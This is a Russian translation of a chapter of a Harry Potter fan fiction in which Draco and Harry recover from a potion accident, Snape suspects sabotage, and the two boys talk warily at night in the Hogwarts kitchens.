Клятвопреступник (Oath Breaker)

Автор: Goblin Cat KC

Перевод: Weis

Бета: atenas

Оригинал: здесь (разрешение автора на перевод получено)

Рейтинг: R (авторский; PG-15 – переводчика)

Пейринг: Драко Малфой/Гарри Поттер, Люциус Малфой/Северус Снейп

Жанр: драма/приключения

Статус: закончен

Краткое содержание: Малфои предпринимают драматичную эскападу, Драко приходится обучать Гарри темной магии, а все студенты Слизерина исчезают.

Глава 6

Не раздеваясь, Драко включил душ и позволил воде смыть остатки ядовитых испарений. Он слышал, как в соседней кабинке Поттер побросал на пол промокшую одежду. Оба юноши молчали. Драко не знал и не хотел знать, что творится в голове у гриффиндорца. Сейчас ему не хотелось думать ни о чем кроме горячей воды, омывающей тело. Он привык думать, что ужасно проживать в кошмарах последние минуты жизни предков, но, увидев безжизненные глаза отца и окровавленное тело матери, понял, что эти сны были всего лишь уроком. Который так и не смог подготовить его к шоку при виде мертвых родителей.

- Они живы, - прошептал Драко, закрыв глаза и прислонившись лбом к прохладной стене. – Живы. Это была всего лишь дурацкая галлюцинация. Просто галлюцинация.

Хуже всего было то, что он не мог знать наверняка. Его родители на самом деле могли быть мертвы – пойманные и замученные Волдемортом. Драко еще повезло, что рядом с их телами ему не привиделось тело Пэнси… Крэбба с Гойлом… и Теодора, и… юноша подавил всхлип. Он не станет плакать, особенно когда рядом Поттер.

Драко быстро разделся и соединил ладони.

- Пусть… - горло сдавило и он осекся, вспомнив устремленные на него пустые глаза отца. Заставив себя сосредоточиться, он заговорил снова: - Пусть дождь очистит мою душу от ночи и теней, что я призвал, - все еще видя перед собой тело матери, он  повторил слова ритуала.

С его кожи потекли клочки тьмы, но даже когда они исчезли и никакой магии больше не осталось, Драко продолжал повторять заклинание, снова и снова. Напевный ритм превратился в молитву об ином дожде, который смог бы уничтожить кошмарный образ, врезавшийся юноше в память. Снова и снова он шептал омывающей его воде заветные слова, и постепенно они прогнали из его мыслей ужасные воспоминания. Драко знал, что они вернутся, скорее всего в кошмарных снах или когда ему станет особенно одиноко в опустевших комнатах Слизерина, но по крайней мере сейчас он был свободен от них.

Услышав позади легкий топоток, юноша обернулся. За занавеской виднелись маленькие силуэты снующих туда-сюда домовых эльфов. Драко выключил воду, вытерся и, наклонившись за мантией, обнаружил, что она исчезла. На влажном полу лежала лишь его палочка. Поворчав, он обернул вокруг бедер полотенце и вышел. С дюжину домовых эльфов торопливо развешивали возле кабинок полотенца, банные халаты и расставляли шлепанцы для тех студентов, которые еще должны были добраться сюда. Драко взял другое полотенце, вытер волосы и бросил его на пол. Не успел он надеть халат, оно исчезло и на вешалке появилось свежее.

Позади раздался удивленный возглас Поттера. Наверное, тот тоже обнаружил, что его одежда пропала. Щурясь, гриффиндорец вышел из кабинки, придерживая грозящее свалиться полотенце, и одновременно пытаясь надеть очки. Вода капала с волос ему на грудь, и Драко воспользовался случаем незаметно его рассмотреть. На гладкой коже Поттера виднелись несколько старых шрамов и пара светло-розовых, совсем недавних. Слизеринец удивился – во что Золотой мальчик умудрился вляпаться на этот раз? – и лениво протянул:

- Не знал, что ты эксгибиционист.

Гарри лишь вздохнул, не желая тратить силы на пикировку.

- Они забрали мою мантию.

Один из домовиков остановился и кивнул, широко улыбнувшись:

- Да, мастер Поттер. Забрали, чтобы хорошенько вычистить и сделать неопасной. Не волнуйтесь, мы как раз приносим одежду из спален, - и убежал со стопкой полотенец.

Гарри взял ближайший халат и поморщился.

- Как это можно носить? Он же просто крошечный!

Драко усмехнулся и посмотрел на себя. Его халат запахивался на талии, оставляя открытыми шею и грудь, подол доходил до середины бедер. Кто бы ни выбирал эту одежду, он явно предпочитал восточный стиль. Драко не считал халат таким уж открытым, но Поттер явно думал по-другому.

- Не переживай. В комнате у меня есть чистые мантии.

Бросив взгляд назад, Гарри на секунду задумался - может, стоит спрятаться в душе и подождать, пока эльф принесет его вещи? Но оба юноши знали, что как только Снейп приведет остальных пострадавших, понадобятся все кабинки.

При виде такой стеснительности Драко усмехнулся, но быстро посерьезнел. Теперь, избавившись от слепящего ужаса и отчаянья, он задумался о том, что произошло на Зельях. Взрыв раздался позади них, но ядовитый дым наполнил класс так быстро, что было невозможно понять, чей же котел взорвался. Ко всему прочему на уроке  присутствовал Драко Малфой, предположительно темный маг, подозреваемый в связях с Волдемортом. И он не просто настоял на участии в работе, но и вызвался напарником к Мальчику-который-выжил.

Даже Дамблдору не удастся замять такой случай и завтра «Пророк» выйдет с заголовком: «Катастрофа на уроке зелий. Подозревается наследник Малфоев».

Драко посмотрел на Поттера:

- Ты можешь взять одну из моих мантий. Она должна быть тебе впору.

- Правда? – тот удивленно уставился на него и настороженно спросил. – С чего такая забота?

- Ничего особенного,  - пожал плечами Драко, поманив гриффиндорца за собой. – Просто скажи Слагхорну и всем, кто будет спрашивать, что это не наш котел взорвался. Тебе они поверят.

Коридоры в их подземельях прихотливо извивались, но комната Драко располагалась недалеко от гостиной. Как и в спальне гриффиндорцев, там находилось пять кроватей, четыре из которых сейчас пустовали. Драко открыл сундук, стоящий в изножье его кровати, и вытащил мантию, которую пришлось укорачивать – она была ему велика. Когда он пожаловался Северусу, тот и не подумал признавать, что ошибся с размером, сухо заявив, что «надежда умирает последней». Больше Драко об этом не заговаривал.

- Вот, примерь эту, - сказал он, протягивая мантию гриффиндорцу.

Гарри осторожно взял ее, держа перед собой на вытянутых руках, словно ожидая, что мантия вот-вот оживет и набросится на него. Убедившись, что опасности нет, он накинул ее на плечи. Мантия доходила ему только до середины лодыжек и оказалась тесновата в плечах, рукава не закрывали запястья, а воротник впивался в шею, но, по крайней мере, она полностью застегивалась спереди.

Пока Поттер одевался, Драко тоже быстро переоделся в нормальную одежду и закрыл сундук, чтобы гриффиндорец не заметил, как мало у него вещей. Это у родителей он мог выпрашивать сколько угодно подарков, но с Северусом такой фокус никогда не работал. Пока у Драко снова не появятся собственные карманные деньги, можно забыть о чистопишущих самозатачивающихся  перьях, модных мантиях и потрясающих сладостях из «Дьявольских наслаждений» - его любимого магазина на Дрянн-аллее.

- У вас все комнаты такие? – спросил Поттер, оглядываясь. Зеленые факелы освещали голые каменные стены. И хотя мебель была точно такой же, как в гриффиндорской спальне, эта комната показалась ему ужасно мрачной.

- Некоторые побольше, но их почти все заняли девчонки, - ответил Драко. – Но, в общем, все одинаковые. А что? Нормальные комнаты.

- Вы не боитесь, что вас затопит? – спросил Гарри. – Вы же под озером.

Драко не знал, известна ли Поттеру старая присказка, что слизеринскую грязь нужно вымыть из замка, но даже если и нет, замечание обидело его.

- Нас затопит не раньше, чем ваша башня обвалится, - холодно заметил он и направился к выходу, убедившись, что Поттер следует за ним. И нарочито громко захлопнул дверь.

Подойдя к гостиной, Драко услышал медленно приближающиеся шаги – остальные пострадавшие, наконец, появились. Домовики деловито провожали их к ванной и сноровисто забирали мантии. Заметив друзей, Гарри направился было к ним, но кто-то остановил его, положив руку на плечо.

- Поговоришь с ними позже, - сказал Мастер зелий. – Идите за мной, оба.

Понурившись в ожидании нагоняя, Драко направился за наставником. Взглянув на шагающего рядом Поттера, он удивился, увидев, что тот держит голову высоко поднятой и хмурится, словно заранее со всем не согласен. Драко, конечно, мог за себя постоять, но он знал, что перечить Северусу – плохая идея.

Посреди гостиной Слагхорн что-то объяснял Дамблдору. Директор молча слушал, задумчиво вертя в руках конфету.

- А, вот вы где! – произнес он, увидев Драко и Поттера. – Северус уверил меня, что с вами все в порядке, но я хотел убедиться лично.

- Кажется, я начинаю привыкать к катастрофам, - заявил Гарри, пытаясь ослабить тугой воротник мантии.

- Я думаю, будет преувеличением называть случившееся катастрофой, - отозвался Слагхорн, неодобрительно взглянув на Драко и Северуса. – До сих пор в моем классе обходилось без инцидентов, но стоило там появиться Малфою, как у него сразу взорвался котел с опасным зельем…

-  Наш котел не взрывался, - перебил его Поттер. – Взрыв раздался позади нас.

Выбитый из колеи замечанием Гарри, Слагхорн произнес, осторожно подбирая слова:

- Вы уверены? В конце концов, на вас подействовало большое количество галлюцинариума. Память может вас подвести…

- Я уверен, - твердо ответил Поттер. - Наше зелье просто тихо булькало, пока мы разговаривали…

- Булькало? – оживившись, перебил его Слагхорн. - Оно не должно… ну, вообще-то, могло, но только если… нет, оно должно было быть инертным. Боюсь, это подтверждает…

- Это не ничего подтверждает, - не дал ему договорить Снейп. – Вы прекрасно знаете, что галлюцинариум может пребывать в трех состояниях – инертном, окисленном и коррозийном. Очевидно, Драко приготовил второй тип, и это было самым лучшим вариантом, принимая во внимание предложенный рецепт.

- Я придерживался формулы, - возразил Слагхорн, - и должна была получиться инертная форма…

- …которая обычно готовится на алкогольной базе, - снова перебил его Снейп. В его голосе слышались одновременно раздражение и самодовольство. – Неужели вы и в самом деле думали, что у кого-нибудь из них выйдет что-то путное? Вы явно не ожидали, что им удастся создать нечто настолько опасное, иначе приготовили бы больше противоядия.

- Больше? – переспросил Поттер. – Его не хватило?

Дамблор печально покачал головой:

- Двоих студентов пришлось отправить в клинику Святого Мунго. Обычно там хранятся самые разные противоядия, но, к сожалению, даже у них не оказалось умиротворяющего зелья – оно слишком редко требуется. Нашим пострадавшим придется довольствоваться общим лечением.

- Сколько времени это займет? – спросил Поттер.

- Меньше недели, - ответил Драко. – Сомневаюсь, что они сойдут с ума, но все равно это плохой повод прогуливать занятия.

- Однако мы отвлеклись, - заметил Слагхорн. – Нам необходимо установить, чей котел взорвался и почему. И нельзя не учитывать тот факт, что это случилось, когда в классе появился темный маг.

Драко едва сдержался, чтобы не оглянуться и убедиться, что кроме них в комнате никого нет, особенно после кошмаров, порожденных зельем. Его немного утешило, что Поттер быстро окинул взглядом гостиную, а Дамблдор жестом заставил молчать разъяренного Мастера зелий.

- Этот темный маг обещал не причинять никому вреда, - сказал старик. – И я полагаю, он держит слово. Нам лучше побыстрее начать расследование, а не возлагать вину на самых очевидных подозреваемых.

Все еще донельзя злой, Северус повернулся к Драко и рявкнул:

- Ты точно следовал рецепту?

Привыкший к раздражительности крестного и уверенный, что сейчас гнев направлен не на него, юноша ответил как можно спокойнее:

- Конечно, нет. Я нарезал стебли тоньше, а глаза растер лучше, чем требовалось в рецепте, и на каждый поворот черпака добавлял четверть оборота в другую сторону.

- Как бы ты изменил рецепт, если бы хотел сделать зелье нестабильным? – не унимался Снейп.

Драко понял -  крестный точно знает, что произошло, и хочет утереть Слагхорну нос, показав, насколько знающий у него ученик.  Может, Северуса обидело, что Дамблдор пригласил нового профессора по Зельям вместо того, чтобы позволить ему вести и Зелья, и Защиту? Если так, то с его стороны несколько лицемерно повторять, что Малфои самонадеянны и обожают делать все напоказ.

- Я бы… не стал мешать в противоположную сторону, - медленно проговорил юноша. – И, думаю, добавил бы… - он задумался. Нужно было что-то вступающее в реакцию с имеющимися ингредиентами, но достаточно незаметное. Он постарался вспомнить, что ему встречалось во время инвентаризации в кладовой крестного, и решил, что подходит только одно.

– …части тех животных или насекомых, которые охотятся на ворон. Скорее всего, некромул, - по едва заметной улыбке Северуса Драко понял, что предположил правильно.

- Некромул? – переспросил Поттер. – Что это?

- Очень маленькие паучки, - ответил Дамблдор. – Их нельзя увидеть невооруженным глазом, но вместе они сплетают тонкую и прочную паутину, которая тянется на многие мили. Они водятся в Запретном лесу и гибнут с наступлением холодов.

- В основном они охотятся на маленьких птиц, - продолжил Снейп. – Но и воронами не брезгуют. А учитывая, что сушеная чемерица похожа по цвету и консистенции на мертвых некромул, легко можно предположить перекрестное загрязнение. Ингредиенты были испорчены.

- Невозможно! – возмутился Слагхорн. – Я сам сушил эту чемерицу, и потом, она вовсе не из Запретного леса! Никакого перекрестного загрязнения быть не могло!

- Случайного – возможно, - вкрадчиво заметил Снейп. – Но вы не запираете класс. Ночью кто угодно может войти и сделать все, что пожелает.

- Вы думаете, это было сделано намеренно? – спросил Дамблдор.

- Уверен, - кивнул Снейп. – И вряд ли виновник находился неподалеку в ожидании взрыва.

- Но это значит, что в школе находится вражеский агент! – всполошился Слагхорн. – Вредитель! Как ему удалось проникнуть сюда и остаться незамеченным?

- На этот вопрос нам лучше найти ответ поскорее, - озабоченно заметил Дамблдор. – Но нужно отыскать истинного виновника, а не подозревать кого-то просто потому, что он нам не нравится. Продолжим разговор в другом месте – кажется, студенты выходят.

Появились две девушки из Равенкло. Одна все еще всхлипывала и другая, заботливо закутав подругу в плед, усадила ее на диван. Обе были расстроены и не обратили никакого внимания на маленькую группку в углу. Драко с трудом подавил вздох, подозревая, что Северус сделал то же самое. Им обоим хотелось поскорее избавиться от нежеланных посетителей, но придется потерпеть, пока те оденутся нормально. Дамблдор окликнул домовика, чтобы убедиться, все ли в порядке, и удалился, напоследок заверив, что сделает все возможное для поимки вредителя.

- Что ж, - с притворной озабоченностью вздохнул Слагхорн, - думаю, я должен поспешить к себе и убедиться, что остальные ингредиенты в порядке. Прошу меня извинить, - он заторопился наружу, явно стараясь убраться побыстрее, пока никто не вспомнил, что он сам когда-то был слизеринцем. Но не успел уйти далеко.

- Минутку, – Северус преградил ему дорогу. – Я бы хотел поговорить с вами о том, что не следует откусывать больше, чем можете прожевать, - стена начала закрываться, но Гарри и Драко еще успели уловить последние слова Мастера зелий, произнесенные угрожающим тоном:

- Ты знаешь, кем я был, Слагхорн, но лучше бы тебе помнить и о том, кем я остаюсь до сих пор. Ты прекрасно подойдешь для пополнения запасов…

Как только в комнате стало тихо, Драко отошел к столу возле стеклянной стены, сел и придвинул к себе отцовский дневник и летопись. К его удивлению, Поттер подошел и встал рядом, уставившись сквозь стекло. В ленивых подводных течениях играл бледный серебристый свет и озеро походило на мраморную гробницу.

- Отсюда можно увидеть кальмара? – вдруг спросил Гарри. – Или русалидов?

- Иногда, - пожал плечами Драко. – Не слишком часто.

- Ясно, – отозвался гриффиндорец, глядя, как от края стекла поднялись несколько пузырьков и исчезли в неярком свете. – Красиво.

- На это стоит посмотреть, когда озеро не замерзшее, - медленно произнес Драко. – Рыбки подплывают совсем близко.

- И вода зеленая, - подхватил Гарри. – Наверное, подходит к обстановке.

Все больше студентов выходило из душевой и рассаживалось по диванам и креслам, с любопытством оглядываясь. Их негромкие голоса заполнили комнату и Драко заговорил тише.

- Ты уже видел дно озера. И я сомневаюсь, что этот разговор просто из вежливости. Чего ты хочешь?

Поттер оглянулся на остальных, придвинул кресло поближе к столу и сел. Наклонившись к Драко, он шепнул:

- Ты сказал, что поворачивать черпак на четверть оборота назад - это темная магия, так? – заинтересовавшись, слизеринец кивнул. – Тогда почему Слагхорн ничего не сказал? Он должен был заметить.

- Конечно, он заметил, - пожал плечами Драко. – Они прекрасно знают о смешении душ и  духов, но притворяются, что понятия об этом не имеют. Они не хотят признавать, что после убийства животного что-то теряется безвозвратно, поэтому и не добавляют обратный поворот. И сами же портят свои зелья. А когда у нас все получается правильно, они говорят, что мы, темные маги, делаем для этого что-то ужасное.

- Но почему бы просто не указать обратный поворот в рецепте? Не обязательно же объяснять, зачем так делать.

- Обязательно. Рано или поздно кто-нибудь заметит, что так нужно поступать только при работе с определенными ингредиентами, и начнет задавать вопросы. Твоя магглорожденная подружка, например.

Гарри сурово взглянул на него и выпрямился:

- Она мне не подружка.

- Да? – ухмыльнулся Драко. – Предпочитаешь своего рыжего приятеля?

- Он мне не… - Поттер осекся, стиснул зубы и поднялся. На мгновение Драко испугался, что гриффиндорец его ударит, но тут увидел вышедших из душевой Уизли и Грейнджер, облаченных в короткие банные халаты. Поттер поторопился присоединиться к ним и троица устроилась на диване. Уизли немедленно принялся сетовать, что на Золотом мальчике надета слизеринская мантия, не забыв отметить, что она ему мала, но Драко перестал обращать на них внимание.

Постепенно все больше и больше студентов выходило в гостиную. Заскучав и не желая ни с кем разговаривать, Драко открыл отцовский дневник. На форзаце золотыми чернилами была сделана надпись: «Моему внуку Люциусу». С герба на первой странице на юношу лениво зашипела крылатая змея. Детские каракули отца, так непохожие на его нынешний элегантный почерк, начинались чуть дальше. Судя по дорогому виду дневника, он был зачарован, чтобы записывать фразы под диктовку хозяина и исправлять ошибки, если тот писал сам. Еще дневник был специально заговорен, чтобы более ранние записи ужимались, оставляя достаточно места новым – пока Драко листал страницы, абзацы удлинялись и становились более пригодными для чтения.

«26 декабря 1964. Получил это на Рождество. Понятия не имею, что здесь писать. Дед говорит, всем растущим детям нужен дневник. Лично я предпочитаю читать чужие.

20 февраля. Дед говорит, я должен попробовать что-нибудь сюда записать. Думаю, ему просто хочется выведать все мои секреты.

27 февраля. Новая учительница по чарам. Надо бы избавиться от нее, но, боюсь, это будет нелегко, особенно после того, что случилось с предыдущей. Хотя не думаю, что и эта задержится.

25 марта. Не пришлось избавляться от училки – отец сделал это за меня. Они с дедом прямо при ней поругались из-за ядов, которые вчера испортились. Отцу пришлось стереть ей память и отослать, но не пойму, почему он меня за это отругал. Дед сказал, что он просто разозлился и что я не виноват. Нас осталось так мало, что приходится идти на  риск и нанимать посторонних.

2 апреля. Отец сказал, что я готов к настоящему обучению и больше не нужно никаких пришлых профессоров. Моим наставником будет дед – он учил и отца тоже. Не могу дождаться. Никто больше не станет вбивать мне в голову заклинания и грамматику!

4 апреля. Ненавижу! Да, вокруг больше нет чужих, и не надо следить за каждым своим словом, но дед гоняет меня хуже, чем домового эльфа! Ото всех растений, что он заставил меня повыдергать, руки просто отваливаются, а от его дурацких кислот и испарений слезятся глаза. А после мне еще пришлось убирать в лаборатории! Ненавижу! Уборка - дело слуг. Малфои не убирают. И не выпалывают сорняки.

7 апреля. Научился готовить зелье из сорняков и всякого мусора. Дед сказал, что оно помогает от водянок и нытья. Надо будет получше прятать дневник.

11 апреля. Отец получил приглашение на банкет в Министерство. Надеюсь, мы не пойдем.

14 апреля. Сегодня дед говорил с воронами. Он сказал, что всегда слушает их, если они собираются возле дома, а нынче утром целая стая расселась на деревьях. Они каркали, как ненормальные. Но он так и не сказал, что узнал от них. Когда я выучу это заклинание?

17 апреля. Похоже, нам все-таки придется тащиться на тот банкет в Министерство. Не пойму, зачем. Ведьмы любят сплетничать о маме, когда думают, что я не слышу.

20 апреля. Все еще слишком болен, чтобы вставать. Никто не говорит мне в чем дело, только велят спать дальше.

24 апреля. Уже могу понемножку ходить. Дед сказал, что на банкете кто-то подлил яд в мой бокал. Тот, кто это сделал, хотел поглядеть, как поступит отец: отвезет меня в Св. Мунго, как полагается добропорядочному колдуну, или побежит в лес, словно темный маг. Я помню только как упал и меня отнесли на диван. Как только мы отошли подальше от гостей, отец отнес меня в рощу, чтобы приготовить противоядие. Дед велел записать рецепт.

«Зелье дохлого паука»: поместить одного свежеразмолотого паука «черная вдова», три ягоды белладонны и семь капель крови в чашу вина и хорошо перемешать. Получается три дозы противоядия от укуса пауков chylapodaen или одна – яда.

Вот почему мне все еще плохо – это не только противоядие, но и яд тоже.

28 апреля. Все еще быстро устаю, поэтому читаю в постели. Отец сказал, что нашел того, кто меня отравил.

5 мая. Почти выздоровел. Дед натаскивает меня в противоядиях и амулетах. Очень интересно. Засиделся допоздна, но отец подарил мне новую руку славы, которой должно хватить надолго. Выглядит свежесрубленной.

10 мая…»

- Прошу внимания, - реплика Северуса заставила Драко прервать чтение и юноша поднял голову. Стоя на верхних ступеньках лестницы, чтобы всем было хорошо его видно, Мастер зелий продолжил говорить, не обращая никакого внимания на снующих среди студентов домовиков:

- Теперь, когда ваша одежда доставлена, вы можете переодеться и отправляться на ужин. Будьте внимательны и не забывайте здесь свои вещи, потому что я не стану снова открывать для вас Слизерин.

Эльфы откуда-то знали, где чьи вещи, и быстро раздали их студентам, явно жаждущим поскорее убраться из подземелий. Быстро накинув мантии прямо поверх банных халатов, все заторопились прочь. Гарри тоже переоделся, бросил позаимствованную мантию на диван и, убедившись, что палочка в кармане, вышел вслед за друзьями.

Крошечные ручки потянули Драко за рукав и он взглянул вниз.

- Мастер Драко, - пропищала эльфийка, протягивая ему чистую одежду, - мы все почистили. Картинка, что была в кармане, намокла, но мы ее высушили.

Юноша взял у нее из рук свою мантию и фотографию. Из-за случившегося он совсем забыл о снимке. Вода размыла рамку, но изображение осталось ярким и четким. Драко посмотрел на родителей и отчего-то занервничал сильнее. Наверное, галлюцинариум все еще давал о себе знать.

Как только гостиная опустела, Северус снял чары, державшие вход открытым, и с удовлетворением посмотрел, как стена сомкнулась, преградив доступ посторонним. Наконец он обратил внимание на ученика, с недовольной гримасой подошел и встал рядом с ним. Юноша захлопнул отцовский дневник и приготовился к выговору.

- Ты пропустил Чары, - начал Северус.

- Да, сэр, - кивнул Драко. – Зачитался в библиотеке, - он хотел добавить, что пропустил и обед тоже, но решил, что наставника это вряд ли волнует.

- Неужели там есть что-то, что может тебя заинтересовать? – спросил Мастер зелий.

- Использование гидр в зельях, - оправдываться не было смысла, так что юный Малфой проглотил комок в горле. Снейп был превосходным наставником, но, обладая острым умом и взрывным темпераментом, частенько ранил чувства Драко. К счастью, на этот раз объяснение его удовлетворило.

- Наконец-то ты проявил хоть какую-то прозорливость, - Мастер зелий повернулся и направился к полкам в углу комнаты. Открыв шкафчик, где хранились ингредиенты и список требуемых Дамблдором зелий, он велел: - Иди сюда. До вечера нам нужно приготовить еще несколько газов.

Драко молча вздохнул. Сегодня обойдется без нагоняя. Наверное, Северус еще не слышал о происшествии в классе Хагрида и о его визите к Помфри. В любом случае, сам Драко не собирался ничего ему рассказывать. Отложив дневник, юноша посмотрел на часы на дальней стене. Ужин был в самом разгаре, и он сомневался, что успеет вовремя закончить работу. Но это неважно - он все равно не чувствовал себя в безопасности в Большом зале. Стараясь не обращать внимания на недовольное урчание в животе, Драко прочел список того, что Северус наметил для него на сегодня, и неохотно потянулся за ингредиентами.

Когда они закончили, уже давно наступил отбой. Заполнив газами последние бутыли, Драко запечатал их и поставил на полку с готовыми зельями. Устало опустив голову на руки, он смотрел, как Северус завершает свою работу. От вони гниющих растений юноша поморщился. Газы, если их правильно хранить, могут быть полезны не меньше чем зелья, но от их запаха у него всегда болит голова.

- Мы сделали почти половину требуемого, - произнес Снейп. Еще раз проверив готовые зелья, он вычеркнул их из списка. – Если так пойдет и дальше, мы закончим с этим заданием еще до конца недели.

- И что? Сможем отдохнуть или получим следующий список? – спросил Драко.

- Следующий, который, скорее всего, будет длиннее, как только они поймут, насколько быстро мы можем работать, - вздохнул Мастер зелий и свернул пергамент. – Сходи поешь, но не задерживайся. Завтра рано вставать.

Драко кивнул, накинул мантию и отправился на кухню. Он сомневался, что в этот час наткнется на кого-нибудь в коридорах, но с поднятым капюшоном чувствовал себя увереннее. На секунду он задумался, каково это - быть Пожирателем, произносить заклятья из-под маски, когда никто не может тебя узнать? Должно быть, здорово. Его родители всегда возвращались со своих ночных прогулок оживленными, на славу позабавившись с грязнокровками и посеяв панику в колдовском мире. Кроме последнего раза – нахмурился Драко – когда в воздухе неожиданно появился Знак мрака. Тогда попрятались все - и Пожиратели, и простые колдуны. Его родители, не на шутку встревоженные, укрылись в их экипаже, сорвали маски и черные мантии, словно Волдеморт мог возникнуть из ниоткуда, а отец обнажил предплечье, где давно поблекшая метка вновь налилась мраком.

Тряхнув головой, чтобы избавиться от неприятных воспоминаний, Драко свернул в короткий коридор, освещенный одним-единственным факелом. Перед ним располагались несколько дверей. Прежде чем открыть ближайшую, юноша оглянулся, проверяя, нет ли кого-нибудь поблизости.

Это была одна из многих тайн, ревниво хранимых слизеринцами, и любимый секрет Драко. В пустой, темной и совсем маленькой, не больше чулана, комнатке находилась лишь врезанная в каменные стены лестница. Начав подниматься и почувствовав, что люк уже близко, Драко поднял руку и коснулся шершавой деревянной поверхности. Нашарив ручку, он поднял дверцу и выбрался на кухню.

Ночью здесь находилось всего несколько эльфов – они расставляли по местам  чистую посуду и готовились к завтраку - все прочие занимались уборкой. Люк, через который забрался Драко, располагался в дальнем углу, подальше от любопытных глаз, но не успел он опустить крышку и отряхнуть мантию,  как к нему уже спешило крошечное созданье с накрытой тарелкой в руках.

- Даффи знала, что мастер Драко зайдет сегодня, - сказала эльфийка и поставила тарелку на стол перед ним. – Даффи следила, чтобы его ужин не остыл.

Драко уселся на табурет, на который эльфы становились, чтобы дотянуться до висящей на стене утвари, и поднял крышку. Ростбиф и пюре еще дымились, с краю лежали несколько пирожков, и Драко сразу же схватил один. Пирожок оказался не таким сладким, как делала Филли, но школьные эльфы не готовили для него всю жизнь, как она, и не знали его вкусов.

Закончив ужин и отодвинув тарелку, юноша уже собрался уходить, прихватив десерт с собой, как вдруг стена неподалеку от него раздвинулась, открыв часть коридора, увешанного картинами с фруктами. В проем шагнул Поттер и замер.

- Малфой? – произнес он, прикрывая глаза от слишком яркого света, стоя в поношенной, ставшей ему слишком тесной за лето пижаме, встрепанный и явно недовольный, что оказался на кухне не один. – Что ты здесь делаешь?

- Ем, - огрызнулся Драко.

- Среди ночи?

- Ты думаешь я стану есть, сидя в одиночестве, на виду у всей школы? А как насчет тебя? Что-то я не вижу значка старосты. Друзья знают, где ты?

Поттер не ответил и Драко понял, что задел его за живое.

Наверняка Золотому мальчику приходится потихоньку смываться просто чтобы побыть одному. Неудивительно, что он рассердился, обнаружив здесь Драко. Но слизеринец вовсе не собирался доставлять ему удовольствие своим уходом.

- Я не обязан перед тобой отчитываться, - пробормотал Поттер. – Просто я проголодался.

Он взял с соседнего стола поднос со сладостями, оставленный, видимо, специально для него, и помедлил у выхода.  В замке было всего несколько мест, где он мог поесть без помех, а возвращаться в Гриффиндор значило снова встретить нежеланную сейчас компанию.

Глядя на Гарри, Драко подумал, что тот совершенно не умеет скрывать свои чувства. Ему на ум пришло сразу несколько дюжин едких замечаний о друзьях гриффиндорца. Он открыл было рот, но передумал. В конце концов, если Уизел не соврал и ему действительно придется какую-то часть дня проводить с Поттером, не стоит портить с ним отношения. Год закулисных интриг научил Драко не только внушать страх, но и понимать, когда лучше использовать кнут, а когда – пряник.

- Тебе не  обязательно уходить, - сказал он.

- Что? – Поттер искоса взглянул на него.

- Тебе явно нужно побыть подальше от друзей, - объяснил слизеринец. – И, вопреки всеобщему мнению, я могу быть… - он попытался подыскать правильное слово. Дружелюбным? Милым? Явно не то, – …вежливым.

Поттер хмыкнул:

- Ты отравил мои пирожные, да? И хочешь посмотреть, как я окочурюсь.

Сам того не желая, Драко улыбнулся:

- У меня бы рука не поднялась отравить десерт. И я предпочел бы видеть тебя живым, по крайней мере до тех пор, пока ты не прикончишь Темного лорда.

Гарри еще немного посомневался, но любопытство пересилило. Он закрыл дверь, взял стул и уселся напротив слизеринца. Несколько минут они ели молча, слушая, как домовики устраиваются на ночь в укромных закоулках и чуланах. Оба чувствовали себя немного странно и старались не смотреть друг на друга. Странные прихоти войны и политики привели двух недругов если и не на одну сторону, но объединили против общего врага, и ни один из них не знал, как обращаться с другим.

- Почему ты называешь его Темным лордом? – вдруг спросил Гарри. – Непохоже, что он главный среди темных магов и все такое.

- Он… - Драко опустил голову и задумался. Черт! Только Поттер мог задать настолько глупый вопрос о том, что невозможно объяснить и что все просто принимают как должное.   – Просто так случилось.

- Что ты имеешь в виду?

Драко взглянул на гриффиндорца и снова чертыхнулся про себя. Как объяснить кому-то точку зрения, совершенно не похожую на его собственную, если тот человек даже не подозревает, что подобное возможно?

- Он сам начал называть себя лордом. Когда стало ясно, что он противостоит Министерству, сообщество темных магов приняло его с распростертыми объятьями, - Драко вздохнул и поник. – Мы думали, что он тот, кого мы ждали все это время – темный повелитель, появившийся, чтобы спасти нас от света.

- Темный повелитель? – насторожился Гарри. – Звучит как пророчество.

- Пророчества это ерунда, - отмахнулся Драко, не заметив, как изменилось выражение лица гриффиндорца. – Никогда не знаешь, что там на самом деле имеется в виду, пока все не произойдет. Нет, темный лорд это не пророчество. Это надежда. Когда-нибудь появится могущественный маг, который объединит нас всех, словно возрожденный Мордред. Он сможет сплотить все наши семьи в неодолимую силу, - у Драко вдруг пропал аппетит и он отложил недоеденное пирожное. – Но по какой-то невероятной прихоти судьбы нынешний темный лорд оказался психом.

- Кто такой Мордред? – спросил Поттер. – Звучит знакомо.

- Еще одно доказательство того, что тебе известна только отредактированная версия истории, - слизеринец отодвинул тарелку и подался вперед. – Теперь моя очередь спрашивать. Почему ты бродишь ночью по школе? – услышав неловкие отговорки, он лишь усмехнулся. – Я не дурак, Поттер. Эльфы специально оставили для тебя десерт. И пусть я был полумертвый от усталости, когда прилетел, но помню достаточно. Очень странно, что любимчик Дамблдора гулял один, ночью, в буран.

Гарри замолчал и уставился в стол.

- Я не могу сказать, - наконец проговорил он.

- Боишься, что я буду смеяться? – спросил Драко и пожал плечами. – Ладно, обещаю: никаких насмешек, что бы ты там ни делал.

- Не в этом дело, - Гарри медленно покачал головой. – Я не могу сказать, потому что не доверяю тебе.

Драко замер, словно получив пощечину. Конечно, он знал, что Поттер все еще ненавидит его за шесть лет издевательств, но, черт побери, он пожертвовал домом, состоянием, возможно даже родными и друзьями, чтобы открыто выступить против Волдеморта. Чего еще им надо? Чтобы в битве он заслонил Золотого мальчика от убийственного проклятья? Да, он несколько лет портил гриффиндорцу жизнь, и что с того? Поттер делал то же самое.

Но истинная причина его гнева была в другом, и Драко удивился, когда осознал ее. На какой-то миг он просто забыл, что совсем один в этом огромном, полном чужаков замке, где ему вообще не следовало быть.

Если бы Люциус не настоял, что Драко сам должен уничтожить имение, ему не пришлось бы лететь одному в Хогвартс. Сейчас они с Пэнси вместе вели бы остальных детей через всю страну к школе, вместе искали бы безопасные пути и временные укрытия.  Может, он бы даже нашел отца с его рыцарями и вступил в бой под его командованием. В любом случае, рядом с ним были бы друзья и союзники.

Драко выпрямился. Не просто друзья, но, что более важно, его окружали бы единомышленники, как и он практикующие темную магию феи Морганы. В отличие от недавней стычки с Хагридом, когда он использовал для защиты напускную браваду, сейчас его гордость была неподдельной.

